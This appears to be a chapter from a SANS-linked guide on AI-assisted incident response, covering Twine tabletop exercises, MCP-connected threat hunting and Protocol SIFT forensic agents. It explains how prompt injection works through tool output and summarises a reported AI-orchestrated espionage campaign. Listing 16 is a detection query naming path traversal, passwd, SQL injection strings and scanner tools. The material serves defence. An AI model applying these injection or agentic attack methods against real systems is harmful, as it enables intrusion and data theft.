:: Fundamentals
You decide to lay the groundwork first. Chapter 1: "What is Incident Response?"

You write about the DAIR model: Prepare, Detect, Verify/Triage, Scope, Contain, Eradicate, Recover, Debrief. You explain each phase with clear examples.

[[Continue to detection techniques->Detection]]
[[Add a war story from your past->WarStory]]

:: CaseStudies
You open with a gripping supply chain hack: Supply Chain Calamity. You provide first person perspectives from the incident response analyst, and the attacker.

[[Add a brief intro chapter first->Fundamentals]]
[[Trust the reader and keep going->Detection]]
In Twine, each passage begins with :: PassageName, followed by the content presented to the user, including decision links written as [[Link text->TargetPassage]], where -> separates the displayed choice from the target passage name.

Gamified Learning for Incident Response Training

Gamification applies game design elements to non-game contexts to increase engagement and improve learning outcomes. Interactive tabletop exercises using Twine incorporate several gamification principles that enhance the effectiveness of incident response training.

Choice and Consequence

Branching scenarios, where decisions lead to different outcomes, engage participants more deeply than passive observation. Responders see the direct results of their choices, reinforcing the connection between actions and consequences in ways that traditional exercises cannot achieve. This immediate feedback loop accelerates learning by making abstract concepts concrete.

Safe Experimentation

Gamified exercises create low-stakes environments where participants can explore risky decisions without real-world consequences. An analyst can choose to delay containment to gather more forensic evidence and observe what happens when the attacker escalates. In traditional exercises, fear of making the "wrong" choice in front of peers can inhibit learning. Interactive formats remove this pressure by accommodating private exploration.

Replayability and Mastery

Traditional tabletop exercises typically run once, limiting exposure to different decision paths. Interactive scenarios support multiple playthroughs, allowing participants to explore alternative approaches and compare outcomes. This repetition builds pattern recognition and decision-making confidence more effectively than single-exposure learning.

Engagement Through Agency

Participants who actively make decisions demonstrate higher engagement than those who passively receive information. Agency in scenario progression transforms learners from observers to active participants. This engagement leads to better retention and more effective transfer of learning objectives.

Organizations implementing gamified tabletop exercises should maintain focus on learning objectives while embracing entertainment value. The goal is to make training more effective by leveraging game mechanics that demonstrably improve learning outcomes for complex, decision-heavy domains like incident response. By making the exercise enjoyable and interactive, facilitators can foster deeper engagement and more meaningful skill development among incident response teams.

AI models can generate Twine-compatible scenarios using structured prompts that define scenario elements, decision points, and learning objectives. By providing the model with clear instructions and examples of the desired output format, facilitators can produce interactive scenarios that they can import directly into Twine for exercise delivery.

I have developed a sample prompt that will help analysts generate interactive tabletop exercise scenarios in Twine format, available at https://urls.sec504.org/twinetabletopprompt. Using this prompt, the model will ask the user a series of questions to gather the necessary context for scenario generation. These questions are optional, but providing detailed answers will better align the generated scenario with organizational needs:

  1. What type of security incident should this exercise cover?

  2. Describe the target organization.

  3. How was the incident first detected?

  4. What are the critical systems or data assets at risk in this scenario?

  5. Any specific threat actor profile you want to use?

  6. What are the key learning objectives?

  7. Do you have any supporting documentation, log files, or other content you would like me to integrate to add organization-specific context and realism?

For this application of accelerating incident response with AI, I downloaded the prompt from my terminal using wget (you can also download it from your browser), saving the file as PROMPT.md, as shown in Listing 15. Next, I launched Claude Code to generate a Twine tabletop exercise, directing it to use the prompt file to guide scenario creation, as shown in Figure 22.

Listing 15. Twine Tabletop Exercise Prompt Setup
$ wget -q -O PROMPT.md https://urls.sec504.org/twinetabletopprompt
$ ls -l
total 32
-rw-r--r--@ 1 jwright  staff    12K Jan 17 11:22 PROMPT.md
Claude Code reading PROMPT.md instructions to generate an incident response tabletop exercise in Twee format
Figure 22. Claude Code Twine Tabletop Exercise Prompt Processing

Read and process the prompt directions in @PROMPT.md

In this section, we’re using Claude Code to leverage file system access for prompt management and output handling. OpenAI’s Codex and Google Gemini CLI tools also support file system access for similar workflows and could be used as alternatives to Claude Code.

Claude Code will process the prompt directions and guide the user through answering the necessary questions to generate a customized tabletop exercise, as shown in the example in Figure 23.

Claude Code asking scenario parameters including incident type selection for the tabletop exercise
Figure 23. Claude Code Twine Tabletop Exercise Prompt Question

After answering the questions, the model generates a Twine-compatible .twee file, as shown in Figure 24. Building and viewing the scenario as an HTML file allows the participant to navigate the interactive exercise, making decisions and exploring different paths based on their choices, as shown in Figure 25.

Twine editor displaying a large grid of interconnected passage nodes for a healthcare IR tabletop exercise
Figure 24. AI-Generated Twine Tabletop Exercise Decision Passages
Browser rendering of a Twine healthcare tabletop exercise with scenario text and four response choice buttons
Figure 25. AI-Generated Twine Tabletop Exercise Story View

Analysts can review the scenario in Twine and make any necessary adjustments. Alternatively, they can return to Claude Code to further refine the scenario by providing additional context or requesting modifications to specific passages or decision points to enhance the exercise experience as desired.

Using the supplied prompt, the generated Twee scenario supports save points, so participants can save their progress, make decisions, and return to earlier saves to experiment with different choice outcomes.

The intermediate techniques covered in this section demonstrate how AI can enhance common incident response workflows, from drafting reports and generating playbooks to building interactive training exercises. These capabilities represent practical, immediately applicable uses of AI that require minimal infrastructure beyond access to an AI model. In the next section, we’ll look at more advanced use cases that integrate AI with external systems for automated data retrieval, real-time analysis, and orchestrated response actions across security tooling.

Advanced Use Cases

Emerging integration standards and agentic AI systems present significant opportunities to accelerate incident response workflows. The Model Context Protocol (MCP) enables AI models to query security tools directly, while agentic systems can execute multi-step analysis tasks with minimal human intervention. These capabilities allow response teams to offload routine data gathering and correlation tasks, freeing analysts to focus on decision-making and containment actions.

Model Context Protocol for Defensive Operations

As we saw earlier in this chapter, MCP provides a standardized method for connecting AI models to external tools and data sources. MCP addresses a fundamental integration challenge: enabling AI systems to interact with the diverse applications and data sources that security teams rely upon.

In this section, we’ll look at the structure of MCP architecture and how MCP can enhance defensive operations by enabling AI models to retrieve real-time data from security tools, automate enrichment tasks, and correlate information across platforms.

Understanding MCP Architecture

To understand how to best leverage MCP to accelerate incident response, it helps to examine its architecture and components. MCP defines several components:

  • MCP Client: The interface through which users interact with the AI model (chat applications, software IDEs, custom interfaces).

  • MCP Server: A service that publishes tools the AI model can invoke to retrieve data or take actions.

  • Underlying Applications: The actual systems and data sources (SIEMs, ticketing systems, threat intelligence platforms, cloud services, source code management systems, etc.).

Three-tier architecture diagram showing MCP client connecting to MCP servers that interface with underlying applications
Figure 26. MCP Architecture Diagram

When a user issues a prompt, the MCP client informs the model about available tools. The model can then request tool execution to gather information relevant to the user’s request. Results flow back through the client to augment the model’s response with live data.

This architecture means an analyst can issue natural language queries that obtain data (stored or dynamically generated) from connected security tools:

  • Search authentication logs from the past 24 hours for any failed logins followed by successful logins from the same user.

  • Check threat intelligence for any information about the domain login.c1ic.link

  • Create a ticket for this incident and assign it to the on-duty analyst.

The model translates natural language intent into appropriate tool calls, retrieves the results, and synthesizes them into a coherent response.
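This flow can be sketched in miniature. The example below is not the actual MCP protocol (which uses JSON-RPC messaging between client and server); it is a simplified stand-in showing how a client-side loop might map user intent to an advertised tool, execute it, and fold the result into a response. The tool names and canned data are hypothetical.

```python
# Simplified illustration of the MCP tool-call flow (not the real
# JSON-RPC protocol): the client advertises tools, the "model" selects
# one, and results flow back to ground the final response.

def search_auth_logs(hours: int) -> list:
    """Hypothetical tool: failed-then-successful logins (canned data)."""
    return [{"user": "jsmith", "failed": 4, "then_succeeded": True}]

TOOLS = {"search_auth_logs": search_auth_logs}

def model_select_tool(prompt: str) -> tuple:
    """Stand-in for the model mapping natural language intent to a tool."""
    if "failed logins" in prompt:
        return ("search_auth_logs", {"hours": 24})
    return (None, {})

def handle_prompt(prompt: str) -> str:
    name, args = model_select_tool(prompt)
    if name is None:
        return "No suitable tool available."
    results = TOOLS[name](**args)   # client executes the requested tool call
    return f"{len(results)} account(s) show failed-then-successful logins."

print(handle_prompt("Search for failed logins followed by successful logins"))
```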

Defensive Applications

MCP integration with AI models allows analysts to leverage powerful defensive capabilities that accelerate common incident response tasks.

Natural Language Threat Hunting

Analysts can describe what they are looking for in natural language, rather than learning and constructing complex query syntax. An MCP server connected to SIEM data and CTI services automatically translates queries like "Show me any systems that communicated with newly registered domains in the past week" into appropriate backend queries. This natural language interface lowers the barrier to threat hunting for analysts who understand threat-hunting techniques but lack platform-specific SIEM query-language expertise. Experienced analysts benefit as well by expressing complex hunt hypotheses without context-switching to query documentation.

Natural language access to SIEM platform interrogation offers a strategic benefit beyond analyst productivity: by abstracting away query language complexity, organizations reduce dependence on proprietary SIEM interfaces and mitigate the vendor lock-in that arises when institutional knowledge becomes tied to platform-specific syntax.

Automated Enrichment

When investigating an indicator, MCP-connected tools can automatically gather context from multiple sources. Threat intelligence reputation, historical sightings in organizational logs, related indicators, and asset information for affected systems can all be retrieved and integrated into the response to a single analyst question. This automated enrichment eliminates the manual process of checking each data source individually, copying relevant findings, and assembling them into a coherent picture.
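A minimal sketch of this fan-out pattern follows, with hypothetical stand-ins for CTI, SIEM, and asset-inventory sources; the function names, fields, and canned verdicts are all illustrative assumptions, not real MCP tool outputs.

```python
# Hypothetical enrichment fan-out: each function stands in for an
# MCP-connected data source answering one question about an indicator.

def cti_reputation(ioc: str) -> dict:
    return {"source": "cti", "verdict": "malicious", "ioc": ioc}

def log_sightings(ioc: str) -> dict:
    return {"source": "siem", "sightings": 3, "ioc": ioc}

def asset_context(ioc: str) -> dict:
    return {"source": "cmdb", "affected_assets": ["WKST01"], "ioc": ioc}

def enrich(ioc: str) -> dict:
    """Gather context from every connected source for one indicator."""
    findings = [fn(ioc) for fn in (cti_reputation, log_sightings, asset_context)]
    return {"indicator": ioc, "findings": findings}

report = enrich("login.c1ic.link")
print(f"{report['indicator']}: {len(report['findings'])} sources consulted")
```

In an MCP deployment, the model performs this fan-out by issuing one tool call per source and assembling the findings, replacing the manual copy-and-correlate workflow.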

Cross-Platform Correlation

MCP servers connecting different security tools can empower queries that span multiple platforms. Finding all alerts related to a specific IP address across EDR, firewall, and email security platforms often requires logging into each platform, running separate queries, and manually correlating results. MCP-enabled correlation performs these lookups automatically and presents unified results. This cross-platform visibility helps analysts identify the full scope of activity without platform-specific access barriers.

Incident Documentation

MCP connections to ticketing systems allow analysts to update incident records through conversation. Documentation can be maintained without context-switching to separate interfaces. As analysts discover new findings, they can instruct the AI to update the incident ticket with specific details, maintaining documentation currency throughout the investigation. This conversational documentation reduces the common problem of outdated tickets that do not reflect the current investigation status.

Security Considerations

MCP integration introduces significant security considerations that organizations should understand.

Prompt Injection

Prompt injection is an attack technique where an adversary manipulates the model to circumvent controls or produce unintended output. When AI systems integrate data from external sources (including MCP server output), the model processes this content alongside its instructions. AI models have difficulty distinguishing between data they should analyze and instructions they should follow, creating an opportunity for attackers to embed malicious instructions within otherwise benign content, such as logging data, a list of Windows service descriptions from an EDR agent, or even a TTP description from a CTI platform. Successful prompt injection can lead to the disclosure of sensitive data, unauthorized model actions, or the manipulation of model behavior.

When MCP servers construct shell commands or database queries based on model output, prompt injection can enable classic injection attacks. Prompt injection vulnerabilities create opportunities for attackers to craft injected SQL statements that can disclose sensitive company data or to execute command injection attacks that run unauthorized commands against the MCP server or the MCP client.
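The contrast is easy to show with a conventional database example. In the sketch below (a generic illustration, not drawn from any particular MCP server), an attacker-influenced string reaches a SQL statement: string interpolation executes the injected logic, while parameter binding treats the same model-derived text as inert data.

```python
import sqlite3

# In-memory stand-in for a ticketing database behind an MCP server tool.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE tickets (id INTEGER, owner TEXT)")
db.execute("INSERT INTO tickets VALUES (1, 'jsmith'), (2, 'akim')")

def find_tickets_unsafe(owner: str) -> list:
    # VULNERABLE: model-derived text is spliced into the statement,
    # so SQL injected via a prompt or tool result executes as code.
    return db.execute(f"SELECT id FROM tickets WHERE owner = '{owner}'").fetchall()

def find_tickets_safe(owner: str) -> list:
    # Parameter binding treats model output strictly as data.
    return db.execute("SELECT id FROM tickets WHERE owner = ?", (owner,)).fetchall()

payload = "' OR '1'='1"                   # classic injection via model output
print(len(find_tickets_unsafe(payload)))  # matches every ticket
print(len(find_tickets_safe(payload)))    # matches none
```

The same principle applies when an MCP server builds shell commands from model output: pass model-derived values as arguments to a fixed command, never interpolate them into a command string.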

Access Control

MCP servers should enforce the same access controls as direct tool access. An analyst should not gain additional capabilities through MCP that they do not have through direct interfaces. If an analyst cannot directly execute password resets in the identity management system, the MCP server should not allow password resets through AI-mediated requests either. Role-based access control applied to the MCP tool availability ensures analysts cannot bypass security controls through conversational interfaces.
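One way to implement this, sketched below with hypothetical tool and role names, is to derive the tool list advertised to the MCP client from the analyst's existing roles, so the conversational interface can never offer a capability the user lacks through direct access.

```python
# Sketch of role-based tool filtering for an MCP server: the advertised
# tool list is a function of the caller's roles, so AI-mediated requests
# cannot reach tools the analyst could not invoke directly.

ALL_TOOLS = {
    "search_logs": {"required_role": "analyst"},
    "reset_password": {"required_role": "identity_admin"},
    "create_ticket": {"required_role": "analyst"},
}

def tools_for(roles: set) -> list:
    """Advertise only the tools the caller's roles permit."""
    return sorted(name for name, spec in ALL_TOOLS.items()
                  if spec["required_role"] in roles)

print(tools_for({"analyst"}))                    # no password resets offered
print(tools_for({"analyst", "identity_admin"}))  # full tool set
```

Filtering at advertisement time is not sufficient on its own; the server should also re-check authorization when each tool is invoked, since a compromised or misbehaving client could request tools it was never shown.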

Audit Logging

All MCP tool invocations should be logged with sufficient detail to reconstruct what actions were taken, by whom, and with what parameters. These logs serve the same purpose as logs from direct tool access, supporting incident investigation when something goes wrong, providing accountability for sensitive operations. Organizations should integrate MCP audit logs with existing security information and event management platforms or with dedicated systems when isolation of MCP logging is required.
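As a sketch of what such instrumentation might look like, assuming a hypothetical Python MCP server where each tool is a function, a decorator can record the tool name, caller, parameters, and result size for every invocation.

```python
import functools
import json
import time

AUDIT_LOG = []   # stand-in for a SIEM or dedicated logging pipeline

def audited(tool):
    """Record every tool invocation with caller, parameters, and result size."""
    @functools.wraps(tool)
    def wrapper(*args, caller="unknown", **kwargs):
        record = {"tool": tool.__name__, "caller": caller,
                  "params": dict(kwargs), "time": time.time()}
        result = tool(*args, **kwargs)
        record["result_count"] = len(result)
        AUDIT_LOG.append(record)   # ship to the SIEM in a real deployment
        return result
    return wrapper

@audited
def search_logs(query: str) -> list:
    return [{"event": "stub", "query": query}]   # canned tool result

search_logs(query="failed logins", caller="jsmith")
print(json.dumps(AUDIT_LOG[0]["params"]))
```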

Data Exposure

MCP can expose data to AI models, which then become part of the conversation context. Once data appears in a conversation, it may be retained by commercial AI platforms, subject to their data-handling policies. Organizations should consider what data sensitivity levels are appropriate for MCP-connected sources. Customer personally identifiable information, authentication credentials, and regulated data may require additional protections or may be prohibited from MCP exposure entirely.

Security research into MCP and AI model integration is ongoing, with new attack techniques and defensive measures emerging regularly. Organizations implementing MCP should monitor security guidance from Anthropic and the broader cybersecurity research community to stay current with evolving threats and best practices for mitigation.

MCP Supply Chain and Registry Risks

MCP servers are often built by independent developers without established security standards. Users often install them using the "pipe cURL to Bash" anti-pattern, and the current MCP specification provides no version pinning, signing, or package locking. This creates a plugin-like ecosystem where unvetted code from GitHub repositories can gain access to sensitive data or local system capabilities.

GitHub repository README showing curl-pipe-to-shell installation commands for an MCP server package
Figure 27. Box.com MCP Server Installation Anti-Pattern

MCP server ecosystems introduce familiar supply chain risks, including typosquatting, impersonation, malicious updates for formerly safe code, and account takeovers of legitimate developers. Further, many MCP clients allow tools to update and run automatically for a seamless user experience, but this implicitly trusts tool developers and the integrity of installation sources, creating ongoing exposure to supply chain compromise.

Organizations adopting MCP should treat servers like packages with elevated privileges: audit before usage, apply least privilege to credentials, consider sandboxing servers with containerization and network egress controls, and maintain internal registries of vetted MCP servers to reduce exposure to unknown code.

MCP Integration for Threat Hunting

Despite MCP’s security concerns, many organizations are adopting it as an integration path that allows AI models to leverage external applications, API servers, and data sources. One compelling use case is integrating log analysis platforms with MCP to enable natural-language threat-hunting queries.

For example, in one collection of web server logs, a query to identify common web server attack patterns (shown in Listing 16) returns a set of log events that the analyst can further scrutinize for indicators of compromise, as shown in Figure 28. Writing this query requires knowledge of OpenSearch Lucene query syntax and an understanding of common web attack patterns.

NOTE: OpenSearch is an open-source fork of Elasticsearch and Kibana, created after Elastic changed its licensing model. While the platforms have diverged somewhat since the fork, OpenSearch retains much of the same query syntax and capabilities as Elasticsearch, enabling users to ingest, search, and analyze log data.

Listing 16. OpenSearch Lucene Web Log Threat Hunting Query Example
(http.response.status_code:(400 OR 401 OR 403 OR 404 OR 500) AND -source.address:"127.0.0.1") OR url.original:(*..* OR *%2e%2e* OR *passwd* OR *wp-admin* OR *phpMyAdmin* OR *shell* OR *eval* OR *base64*) OR url.original:(*union* AND *select*) OR url.original:(*%27* AND *OR*) OR url.original:(*SLEEP* OR *BENCHMARK* OR *information_schema*) OR user_agent.original:(*nikto* OR *sqlmap* OR *nmap* OR *masscan* OR *zgrab* OR *gobuster* OR *dirbuster* OR *wfuzz* OR *nuclei*) OR tags:(potential_attack OR scanner)
OpenSearch Dashboards showing Lucene query results with a histogram of HTTP error responses over two weeks
Figure 28. OpenSearch Lucene Web Log Threat Hunting Query Result

As an alternative, organizations can use the OpenSearch MCP server to integrate AI model capabilities with the OpenSearch cluster containing security logs. Using MCP, analysts can issue natural-language queries that the AI model automatically translates into OpenSearch queries.

Review the Apache logging data for the last two weeks. Provide insight into SQL injection attacks against my web servers, prioritizing results where the server returns a non-500 error.

We used Claude Desktop with MCP integration to query the OpenSearch cluster for Apache web server logs containing SQL injection attempts. For each MCP call, Claude Desktop prompted us to approve the generated OpenSearch query before execution, ensuring analyst oversight (human-in-the-loop, or HITL) of automated queries, as shown in Figure 29. After approving the query, Claude Desktop executed it against the OpenSearch cluster and returned summarized findings revealing attack patterns, as shown in Figure 30.

Claude Desktop requesting approval to execute a raw OpenSearch query against the Apache access log index
Figure 29. Claude Desktop OpenSearch MCP Query Approval
Claude SQL injection analysis summary showing no SQLi evidence but listing path traversal and sensitive file discovery attempts
Figure 30. OpenSearch MCP Natural Language Threat Hunting Query Example

By connecting an MCP server to an OpenSearch cluster containing security logs, analysts can perform threat hunting using conversational queries rather than learning complex query syntax. This allows analysts who are less familiar with OpenSearch to leverage their threat hunting expertise without the barrier of mastering query languages. Further, analysts who are new to threat hunting can use natural language queries to explore log data and learn effective search patterns through model-generated queries.

IMPORTANT: Analysts should not rely solely on AI-generated queries without review. In our testing, Claude Opus did an excellent job reviewing data and designing queries to illustrate attack patterns; however, it did not comprehensively identify all attacks captured in the web server logs. Organizations can use MCP as an augmentation to analyst capabilities, but human expertise remains essential for comprehensive threat hunting.

In addition to abstracting the details of the query syntax from users, MCP integration allows the analyst to iteratively refine their search based on initial findings and to transform the findings into other formats. Through the integration of multiple MCP tools, analysts can build complex workflows that combine data retrieval, analysis, and reporting:

Take these results and produce a brief summary of the attack activity, followed by the detailed log entries in a table. Submit the data to JIRA as a new incident ticket assigned to the web security team with an appropriate title.

By integrating multiple MCP servers, a human analyst can more quickly perform many otherwise manual threat-hunting tasks, benefiting from consistent operational procedures while freeing up time for higher-value analysis and decision-making.

Forensic Analysis Acceleration with Protocol SIFT

AI systems are transforming many aspects of cybersecurity, including offensive and defensive operations. As attackers adopt AI to accelerate attack campaigns, defenders must evolve their investigative capabilities to maintain parity.

Autonomous Adversaries

A significant shift in attacker techniques has occurred with the emergence of AI-orchestrated intrusion campaigns, in which large language models execute substantial portions of the attack lifecycle with minimal human supervision. This represents a new class of threat for organizations where AI acts as an intrusion operator rather than merely as an assistant to human operators.

The implication of this evolving threat is that adversaries can increase both the speed and scale of attacks through parallel reconnaissance, rapid iteration, and simultaneous delivery across many targets. Further, these tools reduce the skill set required of threat actors, lowering the barrier to entry for conducting sophisticated campaigns. This forces defenders to reconsider assumptions about attacker dwell time, the speed of attack progression, and the amount of attacker labor required to run large campaigns.

In September 2025, Anthropic detected and disrupted what it assessed as the first documented case of a large-scale cyber espionage campaign executed largely without substantial human intervention. [8] The campaign, attributed to a Chinese state-sponsored group dubbed GTG-1002, targeted approximately thirty global organizations, including technology companies, financial institutions, chemical manufacturers, and government agencies. The attackers used Claude Code’s agentic capabilities to execute reconnaissance, vulnerability discovery and validation, exploitation, credential harvesting, and data collection. Anthropic stated that the Claude model performed roughly 80-90% of the operational work on behalf of the attackers, with humans mostly setting direction and making a small number of decisions at key moments.

Multi-phase attack architecture showing MCP server tools used for scanning and exploitation with human operator oversight
Figure 31. Anthropic GTG-1002 Threat Actor Campaign Architecture [9]

While Anthropic has not publicly released detailed forensic evidence or IOCs to support its claims (leading to some controversy about the veracity of the report [10]), the implications of AI-orchestrated campaigns are significant, and defenders should use this report as an early indicator of future threat actor capabilities.

Accelerating Forensic Investigations

For many organizations, investigative capabilities have not kept pace with the speed and scale of modern attacks. Attackers have always had an advantage in time-to-action, with forensic processes often requiring considerably longer to complete than the attack lifecycle itself. The use of autonomous AI by threat actors widens this gap to an untenable level, making manual forensic techniques insufficient for a timely response. When responding to AI-powered, autonomous attacks, responders need new approaches that keep pace with threat actors' capabilities while maintaining the rigor required for forensic investigations.

Responding to this need is Protocol SIFT, a framework from the SANS Institute that addresses this challenge by integrating Claude Code’s agentic capabilities into the SIFT Workstation project. With Protocol SIFT, analysts can leverage Anthropic models to orchestrate hundreds of forensic utilities through natural-language instructions. This integration leverages the capabilities of LLM ReAct (Reasoning and Acting [11]) agents to provide autonomous investigative capabilities at accelerated speeds (see the sidebar ReAct Agents: Reasoning and Acting for Enhanced AI Capabilities).

Comparison diagram showing an analyst manually recalling forensic tool commands versus Claude Code automating timeline generation
Figure 32. Protocol SIFT Analyst Opportunity

The application of Protocol SIFT for forensic investigations represents a shift from tool execution to tool orchestration. Rather than choosing tools, reading and re-reading documentation, struggling with complex command-line options, and troubleshooting errors, analysts describe investigative goals; the ReAct agent then determines the appropriate tool chain, executes commands iteratively, evaluates results, and adjusts its approach based on findings until the investigation objective is satisfied.

From Tool Use to Tool Orchestration

Traditional forensic analysis requires analysts to remember complex command-line syntax for hundreds of specialized tools. An analyst investigating a Windows compromise must know the precise flags for log2timeline.py to process event logs, the correct syntax for RECmd to parse registry hives, and how to filter results with psort.py. This cognitive overhead slows investigations and creates barriers for less experienced analysts.

Protocol SIFT transforms this workflow by embedding Claude Code within the SIFT terminal environment. Analysts state investigative intent in plain language, and the AI translates that intent into precise tool invocations. The analyst role shifts from memorizing syntax and running complex command-line tools to directing strategy and evaluating analysis results.

For example, after supplying Protocol SIFT with a directory of evidence collected from a system targeted in a red team engagement, we issued the following prompt in Claude Code:

Use the forensics data included in /mnt/hgfs to build a timeline of activity for November 2025. Identify threats that indicate malicious activity against the system.

Claude Code on a SIFT Workstation prompting forensic timeline analysis of disk image data for November 2025
Figure 33. Claude Code Analysis Prompt on SIFT Workstation

Using Claude Code as an orchestrator, Protocol SIFT autonomously executed a multi-step forensic workflow:

  • Identified the assets available in the /mnt/hgfs directory for analysis as VMware Workstation files.

  • Examined VMware artifacts (logs, screenshots, disk images, memory dumps) to scope the investigation.

  • Mounted VMDK virtual disk image using qemu-nbd for read-only file system analysis.

  • Identified malware samples (AnalyticsInstaller.exe, analytics.exe) and decoded embedded payloads using strings and base64.

  • Analyzed Windows memory dump using strings to recover evidence of Meterpreter execution, Mimikatz usage, and network activity.

  • Parsed Windows Event Logs (Security, PowerShell Operational) using evtxexport to correlate execution events.

  • Reviewed Prefetch files to establish program execution timeline for November 27, 2025.

  • Documented attack chain, persistence mechanisms, and compiled Indicators of Compromise (IOCs).
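Each of these steps remains reproducible with conventional tooling. For instance, the strings-based memory-dump triage can be approximated with a short script; the sketch below mimics the Unix strings(1) default behavior, and the keyword list is illustrative rather than the set Protocol SIFT used:

```python
import re

# Illustrative keyword list; a real hunt would use a curated IOC set.
IOC_KEYWORDS = [b"mimikatz", b"meterpreter", b"sekurlsa", b"Invoke-Expression"]

def ascii_strings(data: bytes, min_len: int = 6):
    """Yield printable-ASCII runs, approximating strings(1) defaults."""
    pattern = rb"[\x20-\x7e]{" + str(min_len).encode() + rb",}"
    for match in re.finditer(pattern, data):
        yield match.group()

def scan_for_iocs(data: bytes) -> dict:
    """Map each matched keyword to the extracted strings that contained it."""
    hits = {}
    for s in ascii_strings(data):
        low = s.lower()
        for keyword in IOC_KEYWORDS:
            if keyword.lower() in low:
                hits.setdefault(keyword, []).append(s)
    return hits

# Usage: hits = scan_for_iocs(open("memory.dmp", "rb").read())
```

Running the same deterministic scan manually is one way to verify that keyword hits reported by the agent actually exist in the evidence.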

After several minutes, the model produced a detailed forensics report summarizing findings, including a timeline of malicious activity on November 27, 2025, as shown in Table 6.

Table 6. Protocol SIFT Timeline of Malicious Activity
| Timestamp | Event | Evidence Source |
|-----------|-------|-----------------|
| 15:55:26 | VM powered on | VMware log |
| 15:56:XX | System boot, user login | Prefetch (explorer.exe, winlogon.exe) |
| 15:57:XX | Process Monitor launched for malware analysis | Prefetch (PROCMON64.EXE) |
| 15:58:XX | analytics.exe executed (malicious payload) | Prefetch (ANALYTICS.EXE-DD592902.pf) |
| 16:23:XX | AnalyticsInstaller.exe executed (malware dropper) | Prefetch (ANALYTICSINSTALLER.EXE-E57CE4F0.pf) |
| 16:23:XX | cmd.exe spawned by malware | Prefetch, Memory dump |
| 16:23:XX | PowerShell executed with encoded command | Prefetch (POWERSHELL.EXE) |
| 16:33:XX | Screenshot captured via Snipping Tool | Prefetch (SNIPPINGTOOL.EXE) |

Claude Code forensic analysis output showing system information and a malicious activity timeline with timestamps and evidence sources
Figure 34. Protocol SIFT Forensic Findings

The combination of natural language direction, autonomous tool orchestration, and iterative reasoning enables Protocol SIFT to accelerate forensic investigations significantly, freeing analysts to focus on strategic decision-making rather than low-level tool operation.

ReAct Agents: Reasoning and Acting for Enhanced AI Capabilities

Protocol SIFT’s autonomous capabilities derive from the ReAct (Reasoning and Acting) agent architecture, a paradigm that combines Chain of Thought reasoning with external tool interaction to improve AI model capabilities on complex tasks.

The ReAct Framework

Traditional language models generate responses based solely on their training data, limiting them to the knowledge captured during training and preventing interaction with external systems. ReAct agents overcome these limitations by interleaving reasoning steps with actions that interact with the external environment. The ReAct cycle operates through three phases:

  • First, the agent receives a task and reasons about how to approach it, breaking complex objectives into manageable steps.

  • Second, the agent takes an action such as executing a command, searching the web, or calling an API, using available tools.

  • Third, the agent observes the results of that action and incorporates the findings into its reasoning for the next iteration.

Circular ReAct workflow diagram showing reasoning and planning followed by action and observation steps for forensic analysis
Figure 35. Protocol SIFT ReAct Workflow Diagram

This cycle repeats until the agent determines the task is complete or requires human intervention.
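The cycle above can be summarized in a minimal Python sketch, where reason() stands in for the LLM call and act() for tool execution; both are placeholders for illustration, not an actual agent framework API:

```python
def react_loop(task, reason, act, max_steps=10):
    """Minimal ReAct skeleton: interleave reasoning, action, and observation."""
    observations = []
    for _ in range(max_steps):
        thought, action = reason(task, observations)  # phase 1: reason about next step
        if action is None:                            # agent concluded the task
            return thought
        observations.append(act(action))              # phase 2: act; phase 3: observe
    return None  # step budget exhausted; escalate to a human analyst
```

The max_steps budget and the None return value illustrate the two termination conditions: the agent deciding the task is complete, or the loop handing control back to a human.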

Chain of Thought Reasoning

Chain of Thought (CoT) prompting enables models to solve complex problems by generating intermediate reasoning steps rather than jumping directly to conclusions. When analyzing forensic evidence, a ReAct agent might reason: "To build a timeline, I need to parse temporal artifacts using Plaso’s log2timeline.py from a disk image. I need to identify the format of the disk image first."

This explicit reasoning makes the agent’s decision process transparent and allows it to recognize when it lacks necessary information or when initial approaches fail.

Action Capabilities

ReAct agents interact with external environments through defined actions. In Protocol SIFT, these actions include executing forensic tools from the terminal, reading file contents to understand the evidence structure, searching documentation when unsure about tool syntax, and requesting human approval before potentially dangerous operations.

Actions can go far beyond command execution, too. For example, a ReAct agent can search the web for threat intelligence about malware signatures, retrieve and parse CTI reports to understand attack patterns, and integrate that external knowledge into its analysis alongside findings from local log data.

Model Context Protocol Integration

MCP provides the standardized interface that allows ReAct agents to interact with external tools and other data sources. Through MCP, Protocol SIFT can orchestrate local forensic utilities on the SIFT Workstation, connect to remote systems via SSH for distributed evidence collection, query threat intelligence feeds for indicator enrichment, and interact with specialized analysis platforms, such as malware sandboxes.

This extensibility means organizations can add new capabilities to Protocol SIFT by implementing MCP servers that expose internal tools or proprietary forensic capabilities, allowing the ReAct agent to incorporate these resources into its investigative workflows. For example, if an organization has a SIEM platform that is useful to query for scoping during investigations, the SIEM-specific MCP server can expose search capabilities, allowing the ReAct agent to retrieve relevant log data as part of its analysis.

Accuracy and Deep Understanding

The ReAct architecture improves accuracy through several mechanisms. Iterative refinement enables the agent to test hypotheses, evaluate results, and adjust its approaches when initial attempts fail. External tool verification grounds findings in deterministic tool output rather than in model inference, reducing the risk of hallucination. Web access provides access to current information beyond the model’s training cutoff date. Transparent reasoning displayed during the model’s analysis allows analysts to understand and verify the decision-making process.

In forensic applications, these improvements translate to greatly accelerated analysis that can still be validated by human analysts. The combination of reasoning capabilities, access to external tools, and iterative problem-solving makes ReAct agents particularly well-suited for complex investigative tasks, where the path to a solution is not immediately obvious and may require multiple approaches before achieving success.

Trust Mechanisms in Autonomous Forensics

Trust in forensic findings is essential, not just for legal defensibility, but also for organizational confidence in incident response decisions. Autonomous AI systems offer significant opportunities for speed and scale, but they also raise concerns about evidence integrity, reproducibility, and the potential for AI hallucinations to contaminate findings. Protocol SIFT implements multiple layers of control to ensure it produces valid forensic assessment results.

The non-determinism of AI models creates particular challenges for forensic soundness, as findings must be verifiable and reproducible to withstand legal scrutiny. At the time of this writing, these are active areas of research and debate within the digital forensics community, and early adopters should carefully consider the implications of AI integration for their forensic practices.

Inference Constraint

Inference constraints define how much the AI model interprets versus how much information is generated by deterministic tools. Protocol SIFT maintains high inference constraint by limiting Claude Code to tool orchestration rather than evidence interpretation.

Instead of asking the model to directly interpret binary data or to guess file contents, Protocol SIFT constrains the AI model to invoke vetted SIFT utilities for evidence analysis. For example, when analyzing a registry hive, Protocol SIFT provides RECmd [12], a well-known and trusted tool, to parse the binary structure of registry data and produce structured output. The model uses the tools vetted for inclusion in SIFT to extract the data for subsequent interpretation.

